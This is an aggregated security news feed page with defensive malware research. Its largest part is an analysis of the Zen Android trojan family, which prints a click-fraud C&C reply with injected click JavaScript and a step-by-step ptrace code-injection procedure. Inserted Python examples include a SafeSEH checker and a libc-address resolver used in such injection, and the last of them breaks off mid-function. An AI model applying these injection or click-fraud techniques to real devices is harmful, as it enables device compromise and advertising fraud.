      • The next check is interesting in that it resolves more than 20 APIs before commencing with the actual debugger check. Fortunately, only the last few APIs are involved with the check (InternalGetWindowText, IsWindowVisible, and EnumWindows). As discussed earlier, usually getting EnumWindows at this point of the unpacking is a bad sign that you’ve failed a debugger check. In this case, it’s different. The callback function passed to EnumWindows must be handled with a breakpoint and iterated until you see InternalGetWindowText and IsWindowVisible getting called as standalone debugger checks.
      • An arbitrary value is passed to SetLastError, followed by an intentional error. GetLastError is called to check if the set value remains, as expected when debugging.
      • GetCurrentThread grabs the current thread handle and passes it to NtSetInformationThread coupled with the ThreadHideFromDebugger enumeration from THREAD_INFORMATION_CLASS. This will detach the process from the debugger if present.
      • CheckRemoteDebuggerPresent
      • FindWindowW looking for the following debugger class names, rather than window names: ObsidianGUI, WinDbgFrameClass, ID, and OLLYDBG
      • CreateFileW checking for a failed attempt at creating \\.\VBoxGuest

    This is just a portion of the anti-debugging phase. Unfortunately, we don’t have the space here to cover the malware’s anti-VM techniques, but this will give you a good start. We decided to proceed with the unpacking of the sample on a bare-metal host to dump the final binary. We identified the final stage as a commercial RAT being used with malicious intent. Pivoting off a dynamic domain name revealed other samples with similarly complex packers (Themida, etc.). The host is not running one, but several control panels for various RATs (including the one we unpacked).

    This was a series of attacks that further complicates detection strategy. In the beginning, we had a commercially available packer that has been used in the past to protect the intellectual property of legitimate software vendors. Further on, the payload resulted in a commercially available RAT that has also been used for legitimate purposes. Although a PUA detection approach could suffice in this case, we have technologies in place such as the Exploit Prevention engine to detect such threats dynamically, in addition to providing telemetry for further investigations. Attackers are relentlessly attempting new methods of bypassing threat detection. In this particular case, commercially available software was used to no avail.
    The attacks were successfully stopped by the Cisco Advanced Malware Protection’s (AMP) Exploit Prevention engine, and the resulting event data only helped out more by providing valuable information on what tools the attackers are using against their targets.

    IOCs

    Original Obsidium packed sample
    3bc0ae9cd143920a55a4a53c61dd516ce5069f3d9453d2a08fc47273f29d1cf3

    Unpacked Imminent RAT sample
    12cca4fcfe311d1136db6736e7f17854746a5e6c7a284c27ea84a5016bf982d7 […]
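    The post notes that the packer's SEH-handler overwrites work only because the sample is 32-bit and was not compiled with SafeSEH. The following Python is an added example, not Talos code: a dependency-free triage check that walks a PE's headers to the Load Config data directory and reports whether SEHandlerTable is populated (the field the /SAFESEH linker option fills), whether the image declares NO_SEH, or whether it is unprotected and so open to this class of handler overwrite. build_pe32 and build_load_config construct a minimal test image in memory; every function name here is this example's own, not a Windows or Talos API.

```python
"""Report whether a 32-bit PE carries SafeSEH.  Added example, not Talos code.

seh_protection() reads only the PE headers, the Load Config directory and
the section table, so it needs no third-party library.  build_pe32() and
build_load_config() are constructed test fixtures, not real samples.
"""
import struct

IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400   # image declares it uses no SEH at all
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG = 10
_PE32_MAGIC = 0x10B


def _rva_to_offset(sections, rva):
    """Map an RVA onto a file offset via the section table."""
    for va, vsize, raw_size, raw_ptr in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError("RVA 0x%x is not backed by any section" % rva)


def seh_protection(data):
    """Classify a PE image: 'not_pe32', 'no_seh', 'safeseh' or 'unprotected'."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != _PE32_MAGIC:
        return "not_pe32"           # PE32+ unwinds via tables, not an SEH chain
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    if dll_chars & IMAGE_DLLCHARACTERISTICS_NO_SEH:
        return "no_seh"
    # Data directories begin at offset 96 of a PE32 optional header, 8 bytes each.
    lc_rva, lc_size = struct.unpack_from(
        "<II", data, opt + 96 + 8 * IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG)
    if lc_rva == 0 or lc_size < 0x48:
        return "unprotected"        # no load config, or too short to hold SEH fields
    sections = []
    for i in range(nsections):
        vsize, va, raw_size, raw_ptr = struct.unpack_from(
            "<IIII", data, opt + opt_size + 40 * i + 8)
        sections.append((va, vsize, raw_size, raw_ptr))
    lc = _rva_to_offset(sections, lc_rva)
    if struct.unpack_from("<I", data, lc)[0] < 0x48:
        return "unprotected"        # structure's own Size predates SEHandlerTable
    seh_table = struct.unpack_from("<I", data, lc + 0x40)[0]   # SEHandlerTable
    return "safeseh" if seh_table != 0 else "unprotected"


def build_load_config(seh_table_va, seh_count):
    """Constructed IMAGE_LOAD_CONFIG_DIRECTORY32 with only the SEH fields set."""
    lc = bytearray(0x48)
    struct.pack_into("<I", lc, 0, 0x48)                       # Size
    struct.pack_into("<II", lc, 0x40, seh_table_va, seh_count)
    return bytes(lc)


def build_pe32(load_config=None, dll_chars=0):
    """Constructed minimal PE32 (i386) test image: one '.rdata' section at
    RVA 0x1000 / file offset 0x400 holding `load_config` when given."""
    sec_rva, sec_raw, raw_size = 0x1000, 0x400, 0x200
    payload = load_config or b""
    dirs = [(0, 0)] * 16
    if load_config:
        dirs[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG] = (sec_rva, len(payload))
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)               # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)   # i386, 1 section
    opt = (struct.pack("<HBBIIIIII", _PE32_MAGIC, 14, 0, 0, raw_size, 0, 0x1000, 0x1000, 0x1000)
           + struct.pack("<III", 0x400000, 0x1000, 0x200)            # ImageBase, alignments
           + struct.pack("<HHHHHH", 4, 0, 0, 0, 4, 0)                 # OS/image/subsystem versions
           + struct.pack("<IIII", 0, 0x2000, 0x400, 0)                # Win32Ver, SizeOfImage, SizeOfHeaders, CheckSum
           + struct.pack("<HH", 2, dll_chars)                         # Subsystem, DllCharacteristics
           + struct.pack("<IIIIII", 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
           + b"".join(struct.pack("<II", rva, size) for rva, size in dirs))
    sec = struct.pack("<8sIIIIIIHHI", b".rdata", 0x1000, sec_rva, raw_size, sec_raw,
                      0, 0, 0, 0, 0x40000040)                         # INITIALIZED_DATA | READ
    headers = dos + b"PE\0\0" + coff + opt + sec
    return headers.ljust(sec_raw, b"\0") + payload.ljust(raw_size, b"\0")


if __name__ == "__main__":
    for label, image in (("no load config", build_pe32()),
                         ("SEH table set", build_pe32(build_load_config(0x401000, 3)))):
        print(label, "->", seh_protection(image))
```

    Run against a real sample, `seh_protection(open(path, "rb").read())` returning "unprotected" for a 32-bit image is the condition the post describes; "safeseh" means a handler address that the linker did not register is rejected by the OS before it is called, which defeats the FS:0 overwrite described above.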

  • Beers with Talos EP44: Fun with 2018’s Worst and Talks We Want to Hear
    by noreply@blogger.com (Mitch Neff) on January 17, 2019 at 12:59 pm

    Beers with Talos (BWT) Podcast Ep. #44 is now available. Download this episode and subscribe to Beers with Talos: If iTunes and Google Play aren’t your thing, click here.

    Ep. #44 show notes: Recorded Jan. 7, 2018

    Most of the episode (after an extended roundtable — we all had a lot to get out after time off), we look back at the 2018 Malware Year in Review, including Olympic Destroyer, VPNFilter, MDM and other unique, large-scale, or otherwise interesting bits of malware that Talos encountered. We also discuss the things we would love to see conference talks about in the new year. Of course, we use that to announce the CFP for Talos Threat Research Summit 2019. If you do defense and want to talk to other defenders, make sure to submit before Jan. 25 here.

    The timeline:

    The topics
      01:00 — Roundtable: Show and tell from holiday vacations
      16:10 — Top Threats of 2018: “Top” means we called them top, there is no objective measure here.
      44:10 — What conference talks would be great to see in 2019
      1:00:30 — TTRS 2019 CFP and conference announcement
      1:10:24 — Parting shots, closing thoughts

    The links
      Talos Year in Malware rundown
      Initial MDM post
      Talos Threat Research Summit CFP

    ==========
    Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
    Hosted by Mitch Neff (@MitchNeff).
    Find all episodes here.
    Subscribe via iTunes (and leave a review!)
    Check out the Talos Threat Research Blog
    Subscribe to the Threat Source newsletter
    Follow Talos on Twitter
    Give us your feedback and suggestions for topics: beerswithtalos@cisco.com […]

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast A brief daily summary of what is important in information security. The podcast is published every weekday and designed to get you ready for the day with a brief, usually 5 minute long, summary of current network security related events. The content is late breaking, educational and based on listener input as well as on input received by the SANS Internet Stormcenter. You may submit questions and comments via our contact form at https://isc.sans.edu/contact.html .

  • ISC StormCast for Tuesday, January 22nd 2019
    by Johannes B. Ullrich, Ph.D. on January 22, 2019 at 2:15 am

    Suspicious GET Request: Do you know what it is? https://isc.sans.edu/forums/diary/Suspicious+GET+Request+Do+You+Know+What+This+Is/24552/
    DNS Flag Day https://dnsflagday.net/ […]

  • ISC StormCast for Monday, January 21st 2019
    by Johannes B. Ullrich, Ph.D. on January 21, 2019 at 3:55 am

    Drupal Patches https://www.drupal.org/sa-core-2019-002 https://www.drupal.org/sa-core-2019-001
    WPML User Data Compromised and Used in EMail To Customers https://wpml.org/2019/01/wpml-org-site-back-to-normal-after-an-attack-during-the-weekend/
    Targeted Attack Uses Google Drive for Exfiltration https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/
    Packet Challenge Solution https://johannes.homepc.org/packet8.txt […]

  • ISC StormCast for Friday, January 18th 2019
    by Johannes B. Ullrich, Ph.D. on January 18, 2019 at 2:05 am

    Android Malware Uses Motion Detection to Evade Analysis https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/
    Twitter for Android Bug https://help.twitter.com/en/protected-tweets-android
    Introduction to WebAuthn/FIDO2 https://medium.com/@herrjemand/introduction-to-webauthn-api-5fd1fb46c285
    Ransomware As a Service https://www.bleepingcomputer.com/news/security/blackrouter-ransomware-promoted-as-a-raas-by-iranian-developer/ […]

  • ISC StormCast for Thursday, January 17th 2019
    by Johannes B. Ullrich, Ph.D. on January 17, 2019 at 1:47 am

    Emotet and Other Malspam Campaigns Resume After Holiday Break https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/
    Magecart Delivered Via Compromised Advertising Sites https://blog.trendmicro.com/trendlabs-security-intelligence/new-magecart-attack-delivered-through-compromised-advertising-supply-chain/
    Premisys Identicard Vulnerabilities https://www.tenable.com/security/research/tra-2019-01
    ES File Explorer Open Port Vulnerability https://github.com/fs0c131y/ESFileExplorerOpenPortVuln […]

  • ISC StormCast for Wednesday, January 16th 2019
    by Johannes B. Ullrich, Ph.D. on January 16, 2019 at 5:15 am

    MSFT Skype/Team Foundation Server Patches https://isc.sans.edu/forums/diary/Microsoft+Publishes+Patches+for+Skype+for+Business+and+Team+Foundation+Server/24540/
    SCP Client Vulnerabilities https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt
    Server Hosting Companies Trivially Hacked https://www.websiteplanet.com/blog/report-popular-hosting-hacked/
    Vulnerabilities in Industrial Remote Controls https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/attacks-against-industrial-machines-via-vulnerable-radio-remote-controllers-security-analysis-and-recommendations
    Oracle Quarterly Critical Patch Update https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.htm […]

Dark Reading: Security Monitoring Dark Reading: Connecting the Information and Security Community

McAfee Labs – McAfee Blogs Securing Tomorrow. Today.

  • IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653
    by Philippe Laulheret on January 10, 2019 at 11:27 pm

    Microsoft recently patched a critical flaw in Internet Explorer’s scripting engine that could lead to remote code execution. The vulnerability is being exploited in the wild and was originally reported by a researcher from Google’s Threat Analysis Group. Microsoft released an out-of-band patch to fix the vulnerability before the normal patch cycle. McAfee products received […] The post IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653 appeared first on McAfee Blogs. […]

  • Ryuk Ransomware Attack: Rush to Attribution Misses the Point
    by John Fokker on January 9, 2019 at 7:00 pm

    Senior analyst Ryan Sherstobitoff contributed to this report. During the past week, an outbreak of Ryuk ransomware that impeded newspaper printing services in the United States has garnered a lot of attention. To determine who was behind the attack many have cited past research that compares code from Ryuk with the older ransomware Hermes to […] The post Ryuk Ransomware Attack: Rush to Attribution Misses the Point appeared first on McAfee Blogs. […]

  • Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems
    by Thomas Roccia on December 19, 2018 at 9:45 pm

    Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon “wiper” malware attacks that struck several companies in the Middle East and Europe. In that analysis we discussed one difference to previous Shamoon campaigns. The latest version has a modular approach that allows the wiper to be used […] The post Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems appeared first on McAfee Blogs. […]

  • McAfee Labs Threats Report Examines Cybercriminal Underground, IoT Malware, Other Threats
    by Raj Samani on December 19, 2018 at 5:01 am

    The McAfee Advanced Threat Research team today published the McAfee® Labs Threats Report, December 2018. In this edition, we highlight the notable investigative research and trends in threats statistics and observations gathered by the McAfee Advanced Threat Research and McAfee Labs teams in Q3 of 2018. We are very excited to present to you new […] The post McAfee Labs Threats Report Examines Cybercriminal Underground, IoT Malware, Other Threats appeared first on McAfee Blogs. […]

  • Shamoon Returns to Wipe Systems in Middle East, Europe
    by Alexandre Mundo on December 14, 2018 at 8:32 pm

    Destructive malware has been employed by adversaries for years. Usually such attacks are carefully targeted and can be motivated by ideology, politics, or even financial aims. Destructive attacks have a critical impact on businesses, causing the loss of data or crippling business operations. When a company is impacted, the damage can be significant. Restoration can […] The post Shamoon Returns to Wipe Systems in Middle East, Europe appeared first on McAfee Blogs. […]

SecurityWeek RSS Feed Latest IT Security News and Expert Insights Via RSS Feed

  • ACLU demands Justice Dept. reveal facial recognition tech use
    by Teri Robinson on January 22, 2019 at 3:07 am

    The American Civil Liberties Union (ACLU) and ACLU of Massachusetts are demanding the Justice Department reveal how the FBI and other federal law enforcement agencies are using facial recognition technology. The rights organization has filed a Freedom of Information Act (FOIA) request to compel the department about the use of the technology “and what safeguards,… The post ACLU demands Justice Dept. reveal facial recognition tech use appeared first on SC Media. […]

  • French privacy regulator fines Google $57M for GDPR violation
    by Teri Robinson on January 22, 2019 at 2:40 am

    French regulators hit Google with a $57 million fine for violating GDPR rules that took effect last May by being less than upfront about how user data is collected and used. French data privacy agency CNIL levied the fine, the first against a U.S. company since GDPR took effect last spring, noting that Google “Essential… The post French privacy regulator fines Google $57M for GDPR violation appeared first on SC Media. […]

  • Researchers find Telegram bot chatter is actually Windows malware commands
    by Robert Abel on January 18, 2019 at 8:09 pm

    Decrypted Telegram bot chatter was found to actually be a new Windows malware, dubbed GoodSender, which uses the messenger platform to listen and wait for commands. Forcepoint researchers discovered what it described as a “fairly simple” year old malware that creates a new administrator account that enables remote desktop once it infects a victim’s device.… The post Researchers find Telegram bot chatter is actually Windows malware commands appeared first on SC Media. […]

  • Google Play boots fake apps that spy on devices’ motion sensor data before dropping Anubis malware
    by Bradley Barth on January 18, 2019 at 7:59 pm

    A fake currency converter and a phony battery utility program are among the latest fraudulent apps to be expunged from Google Play, according to researchers who discovered they were infecting users with a version of the Anubis banking malware family. Both fraudulent apps employ a crafty technique to determine whether it is safe for them… The post Google Play boots fake apps that spy on devices’ motion sensor data before dropping Anubis malware appeared first on SC Media. […]

  • Android ES File Explorer open port vulnerability divulged
    by Doug Olenick on January 18, 2019 at 7:46 pm

    A French cybersecurity researcher is reporting that Android ES File Explorer app can allow others on your local network to remotely access a file on your phone. The app, which has more than 100 million Android installs and is designed to allow for the management of all varieties of file types, has a major open… The post Android ES File Explorer open port vulnerability divulged appeared first on SC Media. […]

Google Online Security Blog The latest news and insights from Google on security and safety on the Internet.

  • PHA Family Highlights: Zen and its cousins
    by Eugene Liderman on January 11, 2019 at 10:09 pm

    Posted by Lukasz Siewierski, Android Security & Privacy Team

    Google Play Protect detects Potentially Harmful Applications (PHAs), which it defines as any mobile app that poses a potential security risk to users or to user data (commonly referred to as “malware”), in a variety of ways, such as static analysis, dynamic analysis, and machine learning. While our systems are great at automatically detecting and protecting against PHAs, we believe the best security comes from the combination of automated scanning and skilled human review. With this blog series we will be sharing our research analysis with the research and broader security community, starting with the PHA family Zen. Zen uses root permissions on a device to automatically enable a service that creates fake Google accounts. These accounts are created by abusing accessibility services. Zen apps gain access to root permissions from a rooting trojan in their infection chain. In this blog post, we do not differentiate between the rooting component and the component that abuses root: we refer to them interchangeably as Zen. We also describe apps that we think are coming from the same author or a group of authors. All of the PHAs that are mentioned in this blog post were detected and removed by Google Play Protect.

    Background

    Uncovering PHAs takes a lot of detective work, and unraveling the mystery of how they’re possibly connected to other apps takes even more. PHA authors usually try to hide their tracks, so attribution is difficult. Sometimes, we can attribute different apps to the same author based on small, unique pieces of evidence that suggest similarity, such as a repetition of an exceptionally rare code snippet, asset, or a particular string in the debug logs. Every once in a while, authors leave behind a trace that allows us to attribute not only similar apps, but also multiple different PHA families to the same group or person.
    However, the actual timeline of the creation of the different variants is unclear. In April 2013, we saw the first sample, which made heavy use of dynamic code loading (i.e., fetching executable code from remote sources after the initial app is installed). Dynamic code loading makes it impossible to state what kind of PHA it was. This sample displayed ads from various sources. More recent variants blend rooting capabilities and click fraud. As rooting exploits on Android become less prevalent and lucrative, PHA authors adapt their abuse or monetization strategy to focus on tactics like click fraud. This post doesn’t follow the chronological evolution of Zen, but instead covers relevant samples from least to most complex.

    Apps with a custom-made advertisement SDK

    The simplest PHA from the author’s portfolio used a specially crafted advertisement SDK to create a proxy for all ads-related network traffic. By proxying all requests through a custom server, the real source of the ads is opaque. The example figure in the original post shows one possible implementation of this technique. This approach allows the authors to combine ads from third-party advertising networks with ads they created for their own apps. It may even allow them to sell ad space directly to application developers. The advertisement SDK also collects statistics about clicks and impressions to make it easier to track revenue. Selling the ad traffic directly, or displaying ads from other sources in a very large volume, can provide direct profit to the app author from the advertisers. We have seen two types of apps that use this custom-made SDK. The first are games of very low quality that mimic the experience of popular mobile games. While the counterfeit games claim to provide similar functionality to the popular apps, they are simply used to display ads through the custom advertisement SDK. The second type of app reveals an evolution in the author’s tactics.
    Instead of implementing very basic gameplay, the authors pirated and repackaged the original game in their app and bundled their advertisement SDK with it. The only noticeable difference is that the game has more ads, including ads on the very first screen. In all cases, the ads are used to convince users to install other apps from different developer accounts, but written by the same group. Those apps use the same techniques to monetize their actions.

    Click fraud apps

    The authors’ tactics evolved from advertisement spam to a real PHA (click fraud). Click fraud PHAs simulate user clicks on ads instead of simply displaying ads and waiting for users to click them. This allows the PHA authors to monetize their apps more effectively than through regular advertising. This behavior negatively impacts advertisement networks and their clients, because advertising budget is spent without acquiring real customers, and impacts user experience by consuming the user’s data plan. The click fraud PHA requests a URL from the advertising network directly instead of proxying it through an additional SDK. The command & control server (C&C server) returns the URL to click along with a very long list of additional parameters in JSON format. After rendering the ad on the screen, the app tries to identify the part of the advertisement website to click. If that part is found, the app loads JavaScript snippets from the JSON parameters to click a button or other HTML element, simulating a real user click. Because a user interacting with an ad often leads to a higher chance of the user purchasing something, ad networks often “pay per click” to developers who host their ads. Therefore, by simulating fraudulent clicks, these developers are making money without requiring a user to click on an advertisement. This example code shows a JSON reply returned by the C&C server. It has been shortened for brevity.
        {
          "data": [{
            "id": "107",
            "url": "<ayud_url>",
            "click_type": "2",
            "keywords_js": [{
              "keyword": "<a class=\"show_hide btnnext\"",
              "js": "javascript:window:document.getElementsByClassName(\"show_hide btnnext\")[0].click();"
            }, {
              "keyword": "value=\"Subscribe\" id=\"sub-click\"",
              "js": "javascript:window:document.getElementById(\"sub-click\").click();"
            }]
          }]
        }

    Based on this JSON reply, the app looks for an HTML snippet that corresponds to the active element (show_hide btnnext) and, if found, the JavaScript snippet tries to perform a click() method on it.

    Rooting trojans

    The Zen authors have also created a rooting trojan. Using a publicly available rooting framework, the PHA attempts to root devices and gain persistence on them by reinstalling itself on the system partition of the rooted device. Installing apps on the system partition makes it harder for the user to remove the app. This technique only works for unpatched devices running Android 4.3 or lower. Devices running Android 4.4 and higher are protected by Verified Boot. Zen’s rooting trojan apps target a specific device model with a very specific system image. After achieving root access, the app tries to replace the framework.jar file on the system partition. Replacing framework.jar allows the app to intercept and modify the behavior of the Android standard API. In particular, these apps try to add an additional method called statistics() to the Activity class. Once inserted, this method runs every time any Activity object in any Android app is created. This happens all the time in regular Android apps, as Activity is one of the fundamental Android UI elements. The only purpose of this method is to connect to the C&C server.

    The Zen trojan

    After achieving persistence, the trojan downloads additional payloads, including another trojan called Zen. Zen requires root to work correctly on the Android operating system.
    The Zen trojan uses its root privileges to turn on an accessibility service (a type of service that allows Android users with disabilities to use their devices) for itself by writing to the system-wide setting value enabled_accessibility_services. Zen doesn’t even check for the root privilege: it just assumes it has it. This leads us to believe that Zen is just part of a larger infection chain. The trojan implements three accessibility services directed at different Android API levels and uses these accessibility services, chosen by checking the operating system version, to create new Google accounts. This is done by opening the Google account creation process and parsing the current view. The app then clicks the appropriate buttons, scrollbars, and other UI elements to go through account sign-up without user intervention. During the account sign-up process, Google may flag the account creation attempt as suspicious and prompt the app to solve a CAPTCHA. To get around this, the app uses its root privilege to inject code into the Setup Wizard, extract the CAPTCHA image, and send it to a remote server to try to solve the CAPTCHA. It is unclear if the remote server is capable of solving the CAPTCHA image automatically or if this is done manually by a human in the background. After the server returns the solution, the app enters it into the appropriate text field to complete the CAPTCHA challenge. The Zen trojan does not implement any kind of obfuscation except for one string, which is encoded using Base64. It is one of the strings, “How you’ll sign in”, that it looks for during the account creation process. The code snippet below shows part of the screen parsing process.
        if (!title.containsKey("Enter the code")) {
            if (!title.containsKey("Basic information")) {
                // The only encoded string in the trojan: "SG93IHlvdeKAmWxsIHNpZ24gaW4=" decodes to "How you’ll sign in"
                if (!title.containsKey(new String(android.util.Base64.decode("SG93IHlvdeKAmWxsIHNpZ24gaW4=".getBytes(), 0)))) {
                    if (!title.containsKey("Create password")) {
                        if (!title.containsKey("Add phone number")) {
                            // ... remaining screen handlers are not shown in the post

    Apart from injecting code to read the CAPTCHA, the app also injects its own code into the system_server process, which requires root privileges. This indicates that the app tries to hide itself from anti-PHA systems that look for a specific app process name or that do not have the ability to scan the memory of the system_server process. The app also creates hooks to prevent the phone from rebooting or going to sleep, and to stop the user from pressing hardware buttons, during the account creation process. These hooks are created using the root access and custom native code called Lmt_INJECT, although the algorithm for this is well known. First, the app has to turn off SELinux protection. Then the app finds the process id of the process it wants to inject code into. This is done using the series of syscalls outlined below. The “source process” refers to the Zen trojan running as root, the “target process” refers to the process into which the code is injected, and [pid] refers to the target process’s pid value.

    1. The source process checks the mapping between a process id and a process name. This is done by reading the /proc/[pid]/cmdline file. This very first step fails on Android 7.0 and higher, even with root permission: the /proc filesystem is now mounted with the hidepid=2 option, which means that a process cannot access another process’s /proc/[pid] directory.
    2. A ptrace(PTRACE_ATTACH) call is made. This allows the source process to trace the target.
    3. The source process looks at its own memory to calculate the offset between the beginning of the libc library and the address of mmap.
    4. The source process reads /proc/[pid]/maps to find where libc is located in the target process’s memory. By adding the previously calculated offset, it gets the address of the mmap function in the target process’s memory.
    5. The source process determines the location of the dlopen, dlsym, and dlclose functions in the target process, using the same technique it used to determine the offset of mmap.
    6. The source process writes the native shellcode into the memory region allocated in the target by calling its mmap. Additionally, it writes the addresses of dlopen, dlsym, and dlclose into the same region, so that they can be used by the shellcode. The shellcode simply uses dlopen to open a .so file within the target process and then dlsym to find a symbol in that file and run it.
    7. The source process changes the registers in the target process so that the PC register points directly to the shellcode. This is done using the ptrace syscall.

    The diagram in the original post illustrates the whole process.

    Summary

    PHA authors go to great lengths to come up with increasingly clever ways to monetize their apps. Zen family PHA authors exhibit a wide range of techniques, from simply inserting an advertising SDK to a sophisticated trojan. The app that resulted in the largest number of affected users was the click fraud version, which was installed over 170,000 times at its peak in February 2018. The most affected countries were India, Brazil, and Indonesia. In most cases, these click fraud apps were uninstalled by the users, probably due to the low quality of the apps. If Google Play Protect detects one of these apps, it will show a warning to users. We are constantly on the lookout for new threats and we are expanding our protections. Every device with Google Play includes Google Play Protect, and all apps on Google Play are automatically and periodically scanned by our solutions. You can check the status of Google Play Protect on your device: Open your Android device’s Google Play Store app.
    Tap Menu > Play Protect. Look for information about the status of your device.

    Hashes of samples

    Type            Package name                                                 SHA256 digest
    Custom ads      com.targetshoot.zombieapocalypse.sniper.zombieshootinggame   5d98d8a7a012a858f0fa4cf8d2ed3d5a82937b1a98ea2703d440307c63c6c928
    Click fraud     com.counterterrorist.cs.elite.combat.shootinggame            84672fb2f228ec749d3c3c1cb168a1c31f544970fd29136bea2a5b2cefac6d04
    Rooting trojan  com.android.world.news                                       bd233c1f5c477b0cc15d7f84392dab3a7a598243efa3154304327ff4580ae213
    Zen trojan      com.lmt.register                                             eb12cd65589cbc6f9d3563576c304273cb6a78072b0c20a155a0951370476d8d […]
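    The click-fraud reply described in this post (the C&C server returns keyword/JavaScript pairs, the app looks for the keyword in the rendered ad and evaluates the matching snippet) can be replayed offline for analysis. The following is an added example written for this page, not code from the post or from the Zen apps: it parses a constructed reply with the same field names as the post's sample, picks the snippet the app would execute against a constructed ad page, and flags replies whose injected JavaScript dispatches clicks. The "<ayud_url>" placeholder is the post's own; the ad HTML and the detection heuristic are assumptions of this example.

```python
"""Added example, not code from the Google post or the Zen apps: replays the
client-side click selection of the Zen click-fraud apps over a constructed
C&C reply and a constructed ad page, and flags replies whose injected
JavaScript dispatches clicks. Field names follow the reply in the post."""
import json
import re

# Constructed reply modelled on the post's sample (brackets closed, straight
# quotes); "<ayud_url>" is the post's own placeholder, not a real URL.
SAMPLE_REPLY = r'''{
  "data": [{
    "id": "107",
    "url": "<ayud_url>",
    "click_type": "2",
    "keywords_js": [{
      "keyword": "<a class=\"show_hide btnnext\"",
      "js": "javascript:window:document.getElementsByClassName(\"show_hide btnnext\")[0].click();"
    }, {
      "keyword": "value=\"Subscribe\" id=\"sub-click\"",
      "js": "javascript:window:document.getElementById(\"sub-click\").click();"
    }]
  }]
}'''

# Constructed ad page: the Subscribe button is present, the "next" anchor is not.
SAMPLE_AD_HTML = '<form><input type="submit" value="Subscribe" id="sub-click"></form>'

# Heuristic (an assumption of this example): injected JS that calls .click().
CLICK_CALL = re.compile(r"\.click\(\s*\)")


def parse_reply(text):
    """Return [(ad_id, url, [(keyword, js), ...]), ...] from a C&C reply."""
    ads = []
    for ad in json.loads(text).get("data", []):
        pairs = [(k["keyword"], k["js"]) for k in ad.get("keywords_js", [])]
        ads.append((ad.get("id"), ad.get("url"), pairs))
    return ads


def select_click_js(html, pairs):
    """Mimic the app: the first keyword found verbatim in the rendered page wins."""
    for keyword, js in pairs:
        if keyword in html:
            return keyword, js
    return None


def looks_like_click_fraud(pairs):
    """True when any snippet the server wants evaluated dispatches a click."""
    return any(CLICK_CALL.search(js) for _, js in pairs)


def analyse(reply_text=SAMPLE_REPLY, html=SAMPLE_AD_HTML):
    """One record per ad: what would be clicked, and whether the reply is fraud-shaped."""
    records = []
    for ad_id, url, pairs in parse_reply(reply_text):
        match = select_click_js(html, pairs)
        records.append({
            "id": ad_id,
            "url": url,
            "matched_keyword": match[0] if match else None,
            "js": match[1] if match else None,
            "click_fraud": looks_like_click_fraud(pairs),
        })
    return records


if __name__ == "__main__":
    for record in analyse():
        print(record)
```

    Feeding a real reply captured from a sample (with its ad page) into analyse() gives the same answer the app would reach; the keyword match is a plain substring test because that is all the post describes, and the heuristic deliberately keys on the injected snippet rather than on the ad URL, which varies per campaign.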
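    Steps 3 to 5 of the injection procedure above rest on one piece of arithmetic: the offset of a symbol from the start of libc is the same in every process that maps the same libc, so (local symbol address minus local libc base) plus the target's libc base, read from /proc/[pid]/maps, gives the symbol's address in the target. The following is an added example for this page, not the trojan's Lmt_INJECT code: it does that resolution over constructed maps excerpts and also checks the /proc mount options, which is where step 1 breaks on Android 7.0 and higher. The maps lines, mounts lines, and the position of mmap inside libc are all constructed values.

```python
"""Added example, not the Zen trojan's Lmt_INJECT code: the address
resolution that steps 3 to 5 of the injection rely on, plus the check that
explains why step 1 fails on Android 7.0 and higher. The injector computes
(address of mmap in its own process) minus (libc base in its own process)
and adds that offset to libc's base in the target, read from
/proc/[pid]/maps; dlopen/dlsym/dlclose are resolved the same way. All maps
and mounts text below is constructed; real addresses differ with ASLR."""
import re

MAPS_LINE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>\S+)\s+"
    r"(?P<offset>[0-9a-f]+)\s+\S+\s+\d+\s*(?P<path>.*)$")


def library_base(maps_text, lib="libc.so"):
    """Lowest mapping start of a library whose file name starts with `lib`."""
    base = None
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line)
        if not m:
            continue
        basename = m.group("path").strip().rsplit("/", 1)[-1]
        if basename.startswith(lib):
            start = int(m.group("start"), 16)
            base = start if base is None else min(base, start)
    return base


def remote_address(local_maps, local_symbol_addr, target_maps, lib="libc.so"):
    """Translate a symbol address in this process into the target's address space."""
    local_base = library_base(local_maps, lib)
    target_base = library_base(target_maps, lib)
    if local_base is None or target_base is None:
        raise LookupError(f"{lib} is not mapped in one of the processes")
    offset = local_symbol_addr - local_base
    if offset < 0:
        raise ValueError("symbol address lies below the library base")
    return target_base + offset


def proc_hidepid(mounts_text):
    """hidepid option of the /proc mount: 0 if absent, None if /proc is not listed."""
    for line in mounts_text.splitlines():
        fields = line.split()
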